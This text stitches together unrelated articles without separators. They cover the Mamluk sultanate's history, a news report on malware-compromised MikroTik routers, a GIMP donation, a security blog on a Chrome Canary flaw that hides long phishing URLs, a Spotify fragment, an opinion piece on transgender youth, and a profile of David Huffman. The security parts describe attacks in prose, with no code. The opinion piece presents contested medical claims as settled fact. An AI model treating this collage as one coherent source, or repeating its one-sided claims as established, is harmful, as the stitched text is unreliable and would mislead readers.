In theory a Mamluk’s life prepared him for little else but war and loyalty to his lord. Great emphasis was placed upon the Furūsiyya– a word made up of the three elements:  the ‘ulum (science), funun (arts) and adab (literature) – of cavalry skills. The Furūsiyya was not dissimilar to the chivalric code of the Christian knight insofar as it included a moral code embracing virtues such as courage, valour, magnanimity and generosity; but it also addressed the management, training and care of the horses that carried the warrior into battle and provided him with leisure time sporting activities. It also included cavalry tactics, riding techniques, armour and mounted archery. Some texts even discussed military tactics: the formation of armies, the use of fire and smoke screens. Even the treatment of wounds was addressed. 

The Mamluk dynasty carefully codified the Furūsiyya, and beautiful illustrated examples were produced. These books also carry the mark of the Mongol influence; many pages are decorated with lotuses and phoenixes, motifs carried from China through the Pax Mongolica. 

The Mamluks lived almost entirely within their garrisons, and their leisure activities show a striking correspondence to the much earlier comment of the military writer Vegetius that the Romans’ drills were bloodless battles and their battles were bloody drills. Polo was the chief among these for the Mamluks; with its need for control of the horse, tight turns and bursts of speed, it mimicked the skills required on the battlefield. Mounted archery competitions, horseback acrobatics and mounted combat shows similar to European jousting often took place up to twice a week. The Mamluk sultan Baybars constructed a hippodrome in Cairo to stage these games and polo matches.

The Mamluks’ opportunity to overthrow their masters came at the end of the 1240s, a time when the Kurdish Ayyubid dynasty, set up by Saladin in the 1170s, had reached a modus vivendi with the Crusader states; skirmishing, rather than outright war, was the order of the day in Syria and the Holy Land. However, events in the east were beginning to impact on the region. The Mongols on the eastern steppes were attacking western Chinese tribes and advancing into southern Russia, pushing other peoples west. In 1244, with the tacit support of the Ayyubids in Cairo, Jerusalem fell to a wandering band of Khwarezmians, an eastern Persian group who were themselves fleeing the Mongol destruction of their fledgling empire. One of their first acts was to destroy the tombs of the Latin kings of Jerusalem. In response, Louis IX of France called a crusade (the seventh) though neither the papacy nor any other major Christian monarch was stirred to action. Rather than directly attacking the Holy Land, Louis planned to wrest the rich lands of Egypt from Islam, hoping that control there would lead to the control of Syria. 

Louis took Damietta in the Nile delta in June 1249 with an army of about 20,000 men. The Egyptian army withdrew further up the river. Louis started to march on Cairo in November and should have gained an advantage from the death of the last Ayyubid sultan, as-Salih. Despite chaos in Cairo during which the sultan’s widow, Shaggar ad Durr, took control –  initially with Mamluk support –  Louis and the Templars were roundly defeated by the Mamluk Bahirya commander Baybars at al-Mansourah (al-Mansur). Louis refused to fall back to Damietta and his troops starved, before a belated retreat during which he was captured in March 1250. He was ransomed in return for Damietta and 400,000 livres. Louis left for Acre where he attempted a long-distance negotiation with the Mongols (who he may have believed to be the forces of the mythical Christian king Prester John) to assist him against the Muslims. 

As-Salih had done much to promote the power of the Mamluks during his reign, perhaps too much, and the Mamluks eventually forced Shaggar ad Durr to marry their commander Aybeg. Louis’ crusade therefore proved the catalyst for the Mamluks to finally dispense with their Ayyubid overlords. The Bahri Mamluk dynasty was set up in 1250, with Aybeg as its first, though not uncontested, sultan. 

However, Aybeg was later murdered in his bath on his wife’s orders. More political murders followed including the beating to death of Shaggar ad Durr until Qutuz, the vice-regent, brought the factions bloodily under his control. 

In February 1258 the Mongol armies of Hulegu, grandson of Chinggis Khan and the brother of Kublai, later the Great Khan and Emperor of China, took Baghdad. The Mongols undertook a wholesale massacre: at least 250,000 were killed, but the intercession of Hulegu’s wife spared the Nestorian Christians. Mongol troopers kicked al-Musta’sim, the last Abbasid caliph and spiritual leader of Islam, to death after having rolled him in a carpet –  the Mongols did not wish to spill royal blood directly. Aleppo fell almost as bloodily soon after, and it was widely reported, though perhaps untrue, that the Mongols used cats with burning tails sent running into the city to end the siege by fire. 

Damascus quickly capitulated, but one of those who escaped the Mongols was the Mamluk general Baybars (1223-77), who had been instrumental in the defeat of Louis in 1249. He fled back to Cairo. 

The Mongols completed their conquest of Syria by the near-annihilation of the Assassin sects and by over-running the kingdoms of Anatolia. Only Egypt, a few isolated cities in Syria and the Arabian Peninsula were left to Islam in its historic heartland. The Mamluk sultanate, in power for less than a decade, had shown few signs of enduring. It was led by sultan Qutuz, who had seized power in November 1259 and was still consolidating his authority. 

Hulegu sent envoys to Qutuz in Cairo demanding his surrender. Qutuz killed the envoys and placed their heads on the gates of the city, considering treaty with the Mongols to be impossible and that exile into the ‘bloodthirsty desert’ was equivalent to death. Qutuz mobilized and was joined by Baybars. 

At this point news arrived that the Mongol Great Khan Mongke had died, and Hulegu returned to Karakorum to support his branch of the family’s claim on power. The remaining Mongol army in Syria was still formidable, numbering about 20,000 men under Hulegu’s lieutenant, Kit Buqa. The Mamluk and Mongol armies encamped in Palestine in July 1260, and met at Ayn Jalut on 8 September.

Initially, the Mamluks encountered a detached division of Mongols and drove them to the banks of the Orontes River. Kit Buqa was then drawn into a full engagement; Qutuz met the first onslaught with a small detachment of Mamluks; he feigned retreat and led the Mongol army into an ambush that was sprung from three sides. The battle lasted from dawn till midday. The Mamluks employed fire to trap Mongols who were either trying to hide or flee the field; Kit Buqa was taken alive and summarily executed by Qutuz. According to the Jama al-Tawarikh (a 14th century Persian history) he swore his death would be revenged by Hulegu and that the gates of Egypt would shake with the thunder of Mongol cavalry horses. 

As the Mamluks returned to Cairo, Baybars murdered Qutuz and seized the sultanate himself. This event set the pattern of succession in the Mamluk Empire: only a handful of sultans ever died of natural causes and of these, one died from pneumonia brought on by permanently wearing armour to ward off assassination attempts. The average reign of the sultans was a mere seven years. Despite this the dynasty proved to be one of the most stable political entities of the medieval Middle East. After the Ottomans had hanged the last Mamluk sultan in 1517, the loss of the Mamluks was universally lamented in Egypt, and many minor Mamluk functionaries remained to manage the Turks’ new province. 

Baybars I proved thorough and ruthless, and a gifted exponent of realpolitik. Even though he was to follow his victory over the Mongols with an assault on the remaining Crusader cities in Syria, he maintained friendly relations with Norman Sicily; and even though he attempted to destroy what remained of Assassin power in Syria, he employed what was left of them to carry out political murders among both his domestic rivals and enemy leaders. Indeed the future king Edward I of England was fortunate to survive a Baybars’ sponsored Assassin attempt on his life in Acre in 1271 during the Eighth Crusade. For some years Baybars kept a member of the Abbasid family as a puppet caliph to engender legitimacy for the Mamluk dynasty – until the unfortunate man was packed off to North Africa and never heard of again. Baybars is said to have died in 1277 from drinking a cup of poisoned wine intended for a guest; the story is probably apocryphal but it fits well with the nature of his life.

It has been suggested that the Mongols, the invincible force of the time, were outclassed by the Mamluks on the battlefield; the Mongols were lightly armoured horse-archers riding small steppe ponies and carrying little but ‘home-made’ weapons for close combat, whereas the heavily armoured Mamluks, on larger Arab-bred horses, could match them in their mounted archery and then close and kill with the lance, club and sword. It has also been argued that the Mongols were lacking in organizational training whereas the Mamluks spent their lives in training. According to this view, the Mongols were most effective only in terms of their mobility and their rate of fire. The Mongols’ use of ‘heavy’ arrows, allied with the waves of galloping cohorts each of which would fire four or five arrows into the enemy, would exhaust the opposition. Indeed, this together with outflanking manoeuvres, appears to have been the pattern of Mongol attacks. Each Mongol trooper had several fresh mounts ready to ensure the momentum of the attack was not lost. 

The Mamluks could match the Mongols’ archery assault with their crafted bows and armour and, though they had just one horse each, they could use the larger size of these mounts to deliver a charge like that of Norman knights but with the addition of mobile archery and a ‘Parthian shot’ if required during withdrawal. The timing of the charge was all. The Mamluks were able to destroy the Mongol army at Ayn Jalut – and again at the second battle of Homs in 1281 – by a series of attacks; their command and control mechanisms must have been impressive. 

The Mamluks themselves formed only the core of Syrian and Egyptian armies. Shortly after Ayn Jalut, the Mongols were defeated again at Homs in 1260 by an army combining Ayyubid levies and Mamluks. Islamic success against the Mongols was founded on the military abilities of the Mamluks, but it was Mamluk statecraft that ultimately defeated the invaders. As well as rapidly clearing Syria of Mongols, they began a process of fortification and improved communications and diplomacy with the Islamic princes of the region, thus consolidating Egyptian power in Syria. The protection of Syria was central to the Mamluk claim to be the defenders of Islam. Egypt’s resources were devoted to building and training the army for Syria, which was always mobilized at the slightest provocation from the Mongols.

Communications within the Mamluk state were also well-organized. Harbours were improved and a four-day postal service established between Cairo and Damascus. Baybars opened up trade with the Spanish kingdom of Aragon and maintained friendly relations with the Italian maritime states. He also sent emissaries to the Golden Horde, the Mongol khanate of Russia with which Hulegu’s Ilkhanate was involved in a protracted struggle. This helped to maintain the flow of slaves from the Black Sea region for the maintenance of the Mamluk system and also built up pressure on the Ilkhanate. Baybars also sent raiding parties into Mongol areas of Armenia, the southern Taurus Mountains and the Seljuk Sultanate of Rum. His priority, though, was to defend Syria and hold Egypt. When he attempted to operate in Anatolia in 1277 and to stir up a Turcoman revolt against the Mongols in this area, he quickly found his resources insufficient for such enterprises.

Baybar’s assaults on Lesser Armenia and the threat of a concerted and simultaneous Mamluk and Golden Horde attack on the Ilkhanate meant that the Mongols felt a need to hem in the Mamluks and if possible bring Northern Syria into their sphere of influence. The spreading of the Muslim faith among the Golden Horde would also have alarmed the Ilkhans, who themselves did not begin converting until late in the 14th century. The Ilkhans’ subject population was overwhelmingly Muslim, and the Mamluks, with their Egyptian-based caliphate, had effectively become the leaders of the Muslim world. In retaliation, the Ilkhanate made agreements with Constantinople, perhaps fearing that Byzantium, too, might engage with the Golden Horde or the Mamluks if the Mongols attacked Greek possessions. 

As well as holding the Mongols at bay, Baybars destroyed the Christian lands of Outremer. In 1263 he captured Nazareth and destroyed the environs of Acre. In 1265 he captured Caesarea and Haifa. He then took the fortified town of Arsuf from the Knight Hospitallers and occupied the Christian town of Athlit. Safed was taken from the Knight Templars in 1266. He slaughtered the Christians if they resisted, and had a particular enmity for the military orders: the Templars and Hospitallers received no quarter. Qalawun, his general and a later sultan, led an army into Armenia in 1266. Sis, the capital, fell in September 1266. With the fall of Armenia the Crusader city of Antioch, first captured by Bohemond in 1098, was isolated. Baybars commenced its siege on 14 May 1268 and the city fell four days later. All the inhabitants who were not killed were enslaved. 

Acre was attacked again in 1267 but withstood the assault. Jaffa fell in March 1268 and Beaufort the following month. In 1271 Baybars took the White Castle and Krak des Chevaliers from the Templars and Hospitallers after a month-long siege, and added to its already awesome fortifications. The Christians had shown that such powerful fortresses could break up insurgencies, make up for a paucity of forces and threaten communication lines, and the Mamluks followed the same policy. 

Baybars may have feared an alliance between the Mongols and Christian powers. The Mongols certainly tried to achieve this and in 1271 Edward Plantagenet, during the Eighth Crusade, was able to convince them to send a sizeable force into Syria to reduce the Mamluk pressure on the remaining Crusader cities. But after the failure of the Crusade the last cities soon fell: Tripoli was taken by the army of Sultan Qalawun, Baybar’s successor, in 1289 and the Crusader settlement of Acre fell in 1291. This effectively made the Syrian coast an impossible beachhead for Christians; there would be no more Crusader attempts to regain the Holy Land or Syria. 

The Mamluk dynasty was now secure, and it lasted until the 16th century. Power struggles prevented continuity at the centre, and even after the Circassian Burji Mamluks seized power from the Bahri Mamluks in the mid-14th century, factionalism and insecurity continued unabated. The Mamluks managed successfully to re-establish their Syrian powerbases following Timur’s brief but hugely destructive invasion in the early 1400s; but the dynasty had been left weakened by the Black Death which had made repeated onslaughts through the Middle East from the mid-14th century and it soon lost the valuable trade revenues of Syria after the Portuguese opened up Europe’s ocean trade and the route to India in the late 15th century. In the end it took two only two brief battles for the Ottoman Sultan Selim I to decimate the last Mamluk army to take the field just outside Cairo near the Pyramids in 1517. The Ottoman army used firearms and artillery, but the Mamluks rode out to meet them with bow, lance and sword. History had caught up with them.

Selim I continued to employ a Mamluk as viceroy, however, and recruitment of Circassians as ‘tax farmers’ continued until the new age arrived in Egypt with Napoleon’s army in 1798. Indeed faction building and Mamluk infighting were still characteristic of Egyptian politics in the early 19th century. 

Although warfare was the primary concern of these slave soldiers, their contribution to Islamic art and architecture was immense. Many of the sultans were remarkable builders, a fine example being Qalawun’s mausoleum complex in Cairo, which includes a mosque, a religious school and hospital. The dynasty’s achievements in the arts of the book, especially of the Qur’an, are also very fine. The importance of fighting and training meant that the art of the armourer was highly prized; Mamluk armour was decorated and intricate, helmets, leggings, spurs and shields often carried inscriptions such as:

Father of the poor and miserable, killer of the unbelievers and the polytheists, reviver of justice among all.

An offshoot of this artifice was high quality metalwork, such as candlesticks, lamps, ewers and basins, highly decorated with musicians and dancers, warriors and images of the hunt. Intricate decoration of Mamluk glassware can also be seen in mosque lamps, many carrying the Qu’ranic inscription,

The lamp enclosed in glass: the glass as it were a brilliant star

– a suitable testament to a dynasty that prevailed against the most powerful empire of the medieval age.

This article originally appeared in the March 2006 issue of History Today with the title 'The Mamluks'. 

Researchers at China's Netlab 360 have discovered that thousands of routers manufactured by the Latvian company MikroTik have been compromised by malware attacking a vulnerability revealed April. While MikroTik posted a software update for the vulnerability in April, researchers found that more than 370,000 MikroTik devices they identified on the Internet were still vulnerable. The attack comes after a previous wave based on a vulnerability made public by WikiLeaks' publication of tools from the CIA's "Vault7" toolkit.

According to a report by Netlab 360's Genshen Ye, more than 7,500 of them are actively being spied on by attackers, who are actively forwarding full captures of their network traffic to a number of remote servers. Additionally, 239,000 of the devices have been turned into SOCKS 4 proxies accessible from a single, small Internet address block.

MikroTik provides routing and wireless hardware for Internet service providers and businesses worldwide, including ISP and campus network infrastructure such as outdoor fiber routers and wireless backbones. The vulnerable routers discovered by Netlab 360, still configured with an unpatched interface for the company's Winbox router configuration utility, are widely distributed—but the largest concentrations of affected networks were in Brazil and Russia. There were 14,000 devices identified operating using US-based IP addresses.

Previously, researchers at Trustwave had discovered two malware campaigns against MikroTik routers based on an exploit reverse-engineered from a tool in the Vault7 leak—the first originally targeting routers in Brazil with CoinHive malware. The attack injected the Coinhive JavaScript into an error page presented by the routers' Web proxy server—and redirected all Web requests from the network to that error page. However, in routers affected by this type of malware found by the Netlab 360 team, the attackers had shot themselves in the foot. "All the external web resources, including those from coinhive.com necessary for web mining, are blocked by the proxy ACLs (access control lists) set by attackers themselves," noted Ye.

Another attack discovered by the Netlab 360 team has turned affected routers into a malicious proxy network, using the SOCKS4 protocol over a very non-standard TCP port (4153). "Very interestingly, the Socks4 proxy config only allows access from one single net-block, 95.154.216.128/25," Ye wrote. Almost all of the traffic is going to 95.154.216.167, an address associated with a hosting service in the United Kingdom.

The attack includes the addition of a scheduled task to report the router's IP address back to the attacker to help maintain the persistence of the SOCKS proxy if the router is rebooted. It's not clear what the proxies are being collected for, but they're currently being used to continuously scan for other vulnerable routers.

The eavesdropping attack leverages MikroTik's built-in packet-sniffing capabilities. The sniffer, which uses the TZSP protocol, can send a stream of packets to a remote system using Wireshark or other packet capture tools. The Netlab 360 team found that more than 7,500 routers that had been compromised were streaming network traffic—largely FTP and email focused traffic, as well as some traffic associated with network management—to a small number of addresses. The vast majority of the streams (5,164 of them) were being sent to an address associated with an ISP in Belize.

Earlier this month, GNOME Foundation announced that they receieved a $400,000 donation from Handshake.org, of which $100,000 they transferred to GIMP’s account.

We thank both Handshake.org and GNOME Foundation for the generous donation and will use the money to do much overdue hardware upgrade for the core team members and organize the next hackfest to bring the team together, as well as sponsor the next instance of Libre Graphics Meeting.

Handshake is a decentralized, permissionless naming protocol compatible with DNS where every peer is validating and in charge of managing the root zone with the goal of creating an alternative to existing Certificate Authorities. Its purpose is not to replace the DNS protocol, but to replace the root zone file and the root servers with a public commons.

GNOME Foundation is a non-profit organization that furthers the goals of theGNOME Project, helping it to create a free software computing platform for the general public that is designed to be elegant, efficient, and easy to use.

Canary, the leading-edge v36 of the Google Chrome browser, includes a new feature that attempts to make malicious websites easier to identify by burying the URL and moving the domains from the URI/URL address bar (known in Chrome as the “Omnibox”) into a location now known as “Origin Chip”. In theory, this makes it easier for users to identify phishing sites, but we’ve discovered a major oversight that makes the reality much different.

Canary is still in beta, but a flaw that impacts the visibility of a URL is typically something we only see once every few years. We’ve discovered that if a URL is long enough, Canary will not display any domain or URL at all, instead showing an empty text box with the ghost text “Search Google or type URL.” While Canary is intended to help the user identify a link’s true destination, it will actually make it impossible for even the savviest users to evaluate the authenticity of a URL.

This creates a golden opportunity for attackers to carry out data-entry phishing attacks. A data-entry attack will send an email luring the recipient to a seemingly genuine website asking the recipient to enter user credentials. (Rohyt described this tactic in more detail in a previous blog). Since these attacks do not use malware, the best (and sometimes only) defense against them is a well-trained user who recognizes that the URL is not leading to a legitimate website. Without the ability to evaluate the URL, even the savviest user could fall victim to this type of attack.

How does Canary differ from current versions of Chrome, and how exactly can this flaw be abused?

Canary, by default, maintains the look and feel of the current or previous Chrome versions (as shown in Figure 1).

Figure 1 — Google Chrome Canary — The First Look

Canary comes with an option to enable “Origin Chip” in the Omnibox. Users and administrators have been able to modify the Chrome browser flags through chrome://flags/ properties according to their home or corporate environment. In this version of Google Chrome, Version 36.0.1975.0 Canary, there is a new flag added as shown in Figure 2.

Figure 2 — Enable Origin Chip in Omnibox flag

Once the Origin Chip is enabled and the browser has been restarted, we immediately see its effect as shown in Figure 3.

Figure 3 — Subfolders are not displayed in Origin Chip

When it comes to subfolders versus subdomains, subfolders do not appear in the Origin Chip nor in the Omnibox but the main domain and subdomains are displayed in the Origin Chip (Figure 4).

Figure 4 — Subdomains are displayed in Origin Chip

Browsers become the primary target when it comes to the largely used applications that directly run on the client-side. To determine if there are any limitations to the Origin Chip, we created three scenarios to test its boundaries. In this case, we considered character or size limitation for URLs in the Origin Chip. In all three scenarios, let’s assume that the link came from a phishing email or a suspicious email.

In our first scenario, we considered a URL that fits into the space provided for Origin Chip with a domain and subdomain length combined to make 30-40 characters. This displayed as Canary intended.

In our second scenario, we considered a longer domain and subdomain combination with longer subfolder (60-70 characters total) to see if it makes any change to the Origin Chip. This scenario also displayed correctly.

For our final scenario, we considered a really long URL, and this is where things got interesting This URL had to be something that exceeded the space provided for the Origin Chip within the Omnibox. The URL in this scenario is as follows:

hxxp://this.is.a.test.for.longurl.to.test.the.canary.property.in.the.new.chrome.browser.and.see.if.it.works.DOMAINNAME.com/CheckingNowWithSampleURLInHere/eb31ac/?login_id=48ea2b9a-4f1b-4bbb-b573-89524db025e9 [URL and DOMAIN obfuscated]

In this case, the subdomain and the domain name has exceeded 100 characters (between 110-120 characters) as shown in Figure 5.

Figure 5 — Domain and Subdomain length exceed Origin Chip’s acceptable limit

To confirm that our scenarios using multilevel subdomains are not the only cases where this happens, we tried adding Scenario 4 with the following URL, which is 98 characters long and is as shown in Figure 6:

www[.]ThisIsAVeryLongURLThatIsCreatedForTestingTheAcceptableLengthsOfOriginChipAndItsLimitations[.]com [URL obfuscated with “[“ and “]”]

Figure 6 — A very long domain name

Adding one more character to the above URL would remove the URL from the Origin Chip as shown in Figure 6. This proves that it doesn’t matter whether it is the subdomain length, multilevel subdomain, or the main domain length itself, if the character length goes beyond 98 characters the Origin Chip will not display any URL.

Omni Chip’s length is subjective to the browser size, so the URL length limits change when the browser is resized. For example, reducing your browser window size reduces the length at which Omni Chip will stop displaying the URL and vice versa. The lengths considered in the above scenarios will work on the default size, although the underlying fact that the URL disappears when Omni Chip exceeds specific length (determined by the size of the browser) remains unchanged.

By burying the concept of URL, or by making this setting permanent in the future versions of Chrome, users will not know the exact link or domain they are visiting, since the URL in the Omnibox disappears, meaning that even security savvy users who have been trained to recognize malicious URLs will be at risk.

How should Chrome remediate this issue? Merely extending the length of the URLs it will display isn’t a solution, because attackers will just make URLs as long as they need to be to avoid being displayed. A potential solution would be to keep the entire URL intact, but put a visual focus on the root domain.

Regardless of what Chrome decides to do, development teams considering this concept should consider alternative methods to display the complete URL.

Representatives for the three major labels declined to comment for this article.

In what may be another sign of the tensions between the entrenched music industry and the streaming service, the three conglomerates have lately favored Spotify’s rivals with promotional goodies. Universal, for example, created an exclusive playlist with Apple Music.

“It’s almost a warning shot by the labels to remind Spotify that, as these stories play out, it’s not just Spotify that controls the narrative,” said Bill Werde, the director of Syracuse University’s Bandier Program on the music industry and a former editor of Billboard magazine.

One company that has made a deal with Spotify is Human Re Sources, a small distributor founded by J. Erving, an artist manager who has worked with Troy Carter, Spotify’s departing head of creative services.

In an interview, Mr. Erving said Spotify had paid a modest advance that helped him establish his company. Human Re Sources, he said, is able to pitch songs directly to Spotify’s internal teams — a rare advantage in the industry’s vast do-it-yourself landscape.

Spotify has not given favorable rates to artists affiliated with Human Re Sources, Mr. Erving said, and it has not guaranteed them placement on its playlists. But the company’s artists have had success penetrating Spotify’s most influential playlists, like New Music Fridays and Rap Caviar. Some of them, like Jussie Smollett — an actor in the hit television show “Empire,” who makes slithery R&B — have also made it onto a Spotify billboard in Times Square.

“Spotify has been very supportive of the stuff that we have released to date,” Mr. Erving said. “But Apple and Pandora have been very supportive as well.”

In preparation for its public stock listing, Spotify hinted that it had big plans to change the “old model” of the music business, which it said relied on “gatekeepers” like record companies and radio. In their place, Spotify said, it wanted to usher in a new era that would help new artists break through more easily.

5 mins

The growing trend in young people suddenly deciding they are “in the wrong body” and must “transition” to the opposite sex is alarming. It means that more and more kids are being sent down a path of drastic body and life changes. The consequences of getting this wrong could not be more serious. Study after study has shown that a majority of youth who claim to have gender dysphoria do not continue to experience this in adulthood. Yet the puberty blockers and the hormone treatments given to ‘trans kids’ eventually lead to permanent sterilisation. And yet as the trend takes hold, the attempts to shut down public debate also grow stronger – which is just as alarming.

Last month, Brown University assistant professor Lisa Littman published a paper looking at this “rapid-onset gender dysphoria” in adolescents and young adults. Through surveying the parents of these teens, she found that this sudden onset of “gender dysphoria” was taking place in peer groups in which one or more friends became gender dysphoric at the same time. In other words, this seemed to be kids following trends.

From the 256 surveys Littman collected, she found that a large majority of these youths were female (82.8%), and 41% had identified as non-heterosexual prior to identifying as transgender. Almost two thirds had also been diagnosed with at least one mental health disorder or neurodevelopmental disability before they claimed to have gender dysphoria.

One might deduce, based on this evidence, that these (mainly) girls were not, in fact, transgender, but lesbians and/or struggling with other mental health issues beyond gender dysphoria. And crucially, that these factors should be explored before leaping to start “transitioning” — a process that eventually involves a lifetime of hormone treatments and a series of complicated surgeries.

These facts, though, have been deemed unspeakable. Those who dare question the concept of gender identity itself — that is that one can have, say, a male body, but be truly a woman ‘on the inside’ — are treated as blasphemers and bigots, viciously harassed, attacked, and even fired from their place of work.

Dr. Kenneth Zucker is a case in point. A sexologist and psychologist who ran the Centre for Addiction and Mental Health (CAMH) Gender Identity Clinic (GIC) in Toronto for more than 30 years, he was fired after trans activists mounted a smear campaign against him. Zucker’s ‘crime’ was to suggest that rather than immediately start children who think they have gender dysphoria on the transition process, perhaps we should first try to “help children feel comfortable in their own bodies.” Zucker himself was not actually opposed to the transition process — if the dysphoria of the youth he was working with persisted, Zucker would support them in their path to transitioning.

But simply acknowledging that desistance happens was apparently unacceptable. Over 500 professional clinicians and academics signed a petition in support of Zucker, arguing that his dismissal was “politically motivated” and that this should “stand as a warning to any clinical researcher who is or considers working at the CAMH: In the event of a conflict with activists for a fashionable cause, the CAMH might well sacrifice them — and the individuals and families they serve in their clinics — for some real or imagined local political gain.” But the damage was done. Zucker had been fired, and his reputation tarnished.

The power trans activists hold not only in terms of controlling the narrative surrounding transgenderism itself, but also in determining legislation, policies, and even what research may be conducted and published, in relation to gender identity is astounding.

Which brings us back to Littman’s study. On August 22, Brown University published a press release about the research, which had been published in PLOS ONE, a peer-reviewed scientific journal. Almost immediately, a small number of trans activists complained, both to Brown University and to the journal itself.

One transgender Twitter user dubbed the paper “anti-transgender hate speech”. Another individual, who goes by the name “Hailey Heartless” and identifies as a “sex worker” and “dominatrix”, tweeted:

“The author of the study just wanted it in writing, she didn’t want anyone to review her flawed methodology or bias. She’s happy to do harm to a marginalized group now and take the hit to her credibility later. @HealthyBrown would be wise to distance themselves…

… The linked article was written using transphobic dogwhistles (sex observed at birth, for example), so it’s most likely that they have a transphobic contributor who knows exactly what they’re doing.”

Rather than stand by the professor and the research, Brown University responded by removing the news story and publishing a statement: “The School of Public Health has heard from Brown community members expressing concerns that the conclusions of the study could be used to discredit efforts to support transgender youth and invalidate the perspectives of members of the transgender community.” PLOS ONE published a comment on Littman’s study, explaining:

“PLOS ONE is aware of the reader concerns raised on the study’s content and methodology. We take all concerns raised about publications in the journal very seriously, and are following up on these per our policy and COPE guidelines. As part of our follow up we will seek further expert assessment on the study’s methodology and analyses. We will provide a further update once we have completed our assessment and discussions.”

This response is shocking – the initial complaints came from a small minority of people, none of whom are scholars or scientists. The two individuals who led efforts to have Littman’s research removed and discredited don’t have any particular expertise to offer on her study, beyond being males who choose to identify as women. They have not undertaken a scientific study. They are deeply committed to defending the notion of gender identity and insist that it is possible for males to become literal females, based on nothing more than an announcement of one’s preferred pronouns.

Academic studies and public debate should not be narrowly determined by those committed to the ideologies in question. No idea can be deemed to be intellectually sound or true, without any doubt, if it isn’t subjected to critique and rigorous study and discussion. And despite the fact that trans activists insist gender identity is not an idea, but a scientific fact, it is clear that this is not the case when the concept of gender itself remains the subject of debate.

Feminists, for example, consider gender to be the set of stereotypes imposed on people at birth, based on their biological sex – for example, the idea that men are unemotional and adventurous whereas women are emotional and passive. These ideas do not determine our physical bodies. Trans activists, on the other hand, along with many on the religious Right, believe that gender is hard-wired, and that these stereotypes are both natural and innate, intricately connected to one’s biological sex (and, in the case of trans activists, they believe these stereotypes and an individual’s feelings about gender actually determine one’s sex).

Littman’s research was subject to peer review, revised based on reviewer comments, accepted, then published; meaning her study was determined to be credible and ethical. This does not mean that research should be protected from critique, but, as a former Dean of Harvard Medical School, Jeffrey S. Flier, wrote recently, Littman’s critics “have not performed any systematic analysis of her findings, but seem principally motivated by ideological opposition to her conclusions.”

But regardless of the motivations and actions of these critics, what is more troubling is the cowardice demonstrated on this issue by so many today. Politicians and legislators are clamouring to appear politically correct by creating legislation and policies supporting the notion of gender identity, without considering the consequences. Those who speak out or ask questions about the ideology and activism behind the transgender movement are threatened, abused, no-platformed, fired, and smeared. And too many are simply watching this happen in silence for fear they will be targeted or ostracised themselves.

It should terrify all of us that what we may study, debate and question is being determined by a small group of ideologues, many of whom go so far as to advocate violence against those who don’t toe the line. Regardless of your opinion on transgenderism itself, for all of us, our right to free speech, to speak the truth, and to think critically is under serious threat.

From the September 1991 issue of Scientific American, pp. 54, 58.

PROFILE: DAVID A. HUFFMAN

Encoding the “Neatness” of Ones and Zeroes

Large networks of IBM computers use it. So do high-definition television, modems and a popular electronic device that takes the brain work out of programming a videocassette recorder. All these digital wonders rely on the results of a 40-year-old term paper by a modest Massachusetts Institute of Technology graduate student—a data compression scheme known as Huffman encoding.

In 1951 David A. Huffman and his classmates in an electrical engineering graduate course on information theory were given the choice of a term paper or a final exam. For the term paper, Huffman’s professor, Robert M. Fano, had assigned what at first appeared to be a simple problem. Students were asked to find the most efficient method of representing numbers, letters or other symbols using a binary code. Besides being a nimble intellectual exercise, finding such a code would enable information to be compressed for transmission over a computer network or for storage in a computer’s memory.

Huffman worked on the problem for months, developing a number of approaches, but none that he could prove to be the most efficient. Finally, he despaired of ever reaching a solution and decided to start studying for the final. Just as he was throwing his notes in the garbage, the solution came to him. “It was the most singular moment of my life,” Huffman says. “There was the absolute lightning of sudden realization.”

That epiphany added Huffman to the legion of largely anonymous engineers whose innovative thinking forms the technical underpinnings for the accoutrements of modem living—in his case, from facsimile machines to modems and a myriad of other devices. “Huffman code is one of the fundamental ideas that people in computer science and data communications are using all the time,” says Donald E. Knuth of Stanford University, who is the author of the multivolume series The Art of Computer Programming.

Huffman says he might never have tried his hand at the problem—much less solved it at the age of 25—if he had known that Fano, his professor, and Claude E. Shannon, the creator of information theory, had struggled with it. “It was my luck to be there at the right time and also not have my professor discourage me by telling me that other good people had struggled with this problem,” he says.

DAVID A. HUFFMAN expresses mathematical theorems in intricate paper sculptures. Photo: Matthew Mulbry

Like many codes, including the one named after Samuel Morse, Huffman’s creation tried to find a way to assign the shortest codes to those characters used most, the longest codes being reserved for those used rarely if at all. This process was carried out by forming a so-called coding tree, in which the probability that a number, letter or another character will occur is designated as a leaf on a tree.

The two lowest probabilities are summed to form a new probability. Combining of probabilities continues along the branches of the tree until the last two numbers add up to 1.0, which forms the tree root. Each probability is a leaf, and each branch of the tree is assigned a zero or a one. Code words are formed by moving along the branches from the root to the top of the tree, aggregating the binary digits along the way.

If letters are to be encoded, an E, which might have a probability of 0.13, could be represented by the code 101. The three-digit code is constructed by moving from the root along three branches—marking a 1, 0 and 1, respectively—to reach the leaf that corresponds to 0.13. The E receives a shorter code than a Q, a letter that occurs less frequently. By systematically employing codes of varying length, Huffman’s idea may reduce by a half or even more the number of code symbols that would be needed if the codes were of a fixed length.

Huffman did not invent the idea of a coding tree. His insight was that by assigning the probabilities of the longest codes first and then proceeding along the branches of the tree toward the root, he could arrive at an optimal solution every time. Fano and Shannon had tried to work the problem in the opposite direction, from the root to the leaves, a less efficient solution. When presented with his student’s discovery, Huffman recalls, Fano exclaimed in his thick Italian accent: “Is that all there is to it!”

Products that use Huffman code might fill a consumer electronics store. A recent entry on the shop shelf is VCR Plus+, a device that automatically programs a VCR and is making its inventors wealthy. (Some newspapers on their own list a toll-free number that readers can call for information about where to buy the device.) Instead of confronting the frustrating process of programming a VCR, the user simply types into the small handheld device a numerical code that is printed in the television listings. When it is time to record, the gadget beams its decoded instructions to the VCR and cable box with an infrared beam like those on standard remote-control devices. This turns on the VCR, sets it (and the cable box) to the proper channel and records for the designated time.

Although he acknowledges that he is best known for his code, Huffman says he is most proud of his doctoral thesis, which may be the first formal methodology for devising asynchronous sequential switching circuits, an important type of computer logic. The thesis helped him obtain a faculty position at M.I.T. to teach a course on switching circuits.

His work also attracted the attention of others. During the early 1960s, William O. Baker, then vice president of research for AT&T Bell Laboratories, tapped Huffman to sit on a committee that was reviewing future technology plans for the National Security Agency. What may have attracted Baker was work by Huffman that had outlined a method for converting one sequence of binary numbers into another without losing any information in the translation, a technique that had obvious application in cryptography.

In 1967 Huffman left his position as full professor at M.I.T. to move to the University of California at Santa Cruz, which had lured him to become the first head of its new department of computer science. The relocation brought him closer to the western mountains where he loves to backpack and camp. (At the age of 65, he now prefers snorkeling and body surfing.) Today Huffman is no longer head of the department, but he still teaches a course in digital signal processing at the university.

